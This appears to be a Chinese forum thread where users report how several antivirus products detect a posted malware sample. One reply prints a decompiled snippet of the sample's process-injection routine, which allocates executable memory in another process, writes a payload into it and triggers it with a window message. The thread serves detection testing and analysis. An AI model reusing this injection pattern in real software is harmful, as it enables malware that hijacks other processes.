样本 1X

显示全部楼层 · 发表于 2024-7-25 12:40:40

显示全部楼层 · 发表于 2024-7-25 12:45:12

显示全部楼层 · 发表于 2024-7-25 12:56:52

显示全部楼层 · 发表于 2024-7-25 13:06:15

ESET

复制代码

显示全部楼层 · 发表于 2024-7-25 13:09:30

本帖最后由 DisaPDB 于 2024-7-25 13:12 编辑

360 QVM202

显示全部楼层 · 发表于 2024-7-25 13:15:13

瑞星防病毒扫描miss

显示全部楼层 · 发表于 2024-7-25 13:30:07

Injector.

if ( v24 )
{
v25 = OpenProcess(0x1FFFFFu, 0, dwProcessId);
LODWORD(dwSize) = 0;
((void (__fastcall *)(SIZE_T *, _BYTE *, __int64))unk_1409DA3C6)(&dwSize, byte_1412AA010, 4i64);
v61 = 0i64;
v62 = 0;
v26 = VirtualAllocEx(v25, 0i64, (unsigned int)dwSize, 0x3000u, 0x40u);
v27 = (int)v26;
if ( v26 )
{
if ( WriteProcessMemory(v25, v26, &unk_1412AA014, (unsigned int)dwSize, 0i64) )
{
v28 = VirtualAllocEx(v25, 0i64, dword_1412AA000 - 4i64, 0x3000u, 0x40u);
v29 = (int)v28;
if ( v28 )
{
if ( WriteProcessMemory(v25, v28, byte_1412AA010, dword_1412AA000 - 4i64, 0i64) )
{
v30 = VirtualAllocEx(v25, 0i64, 0x20ui64, 0x1000u, 0x40u);
v36 = v30;
if ( v30 )
{
Buffer = 686588744;
v53 = -29368;
v54 = 13;
v55 = v29 - (_DWORD)v30 - 11;
v56 = -24;
v57 = v27 - (_DWORD)v30 - 16;
v58 = -2092384205;
v59 = 10436;
v60 = -61;
if ( WriteProcessMemory(v25, v30, &Buffer, 0x20ui64, 0i64) )
{
v31 = VirtualAllocEx(v25, 0i64, 8ui64, 0x3000u, 0x40u);
v37 = v31;
if ( v31 )
{
WriteProcessMemory(v25, v31, &v36, 8ui64, 0i64);
v32 = VirtualAllocEx(v25, 0i64, 8ui64, 0x3000u, 0x40u);
v33 = (LPARAM)v32;
if ( v32 )
{
WriteProcessMemory(v25, v32, &v37, 8ui64, 0i64);
PostMessageW(v24, 0x4ACu, 0i64, v33);
}
}
}
}
}
}
}
}
}

复制代码

显示全部楼层 · 发表于 2024-7-25 13:36:57

bd kill
cs kill

显示全部楼层 · 发表于 2024-7-25 14:14:13

腾讯电脑管家 1X

显示全部楼层 · 发表于 2024-7-25 14:22:40

avast miss （已经麻了）

[病毒样本] 样本 1X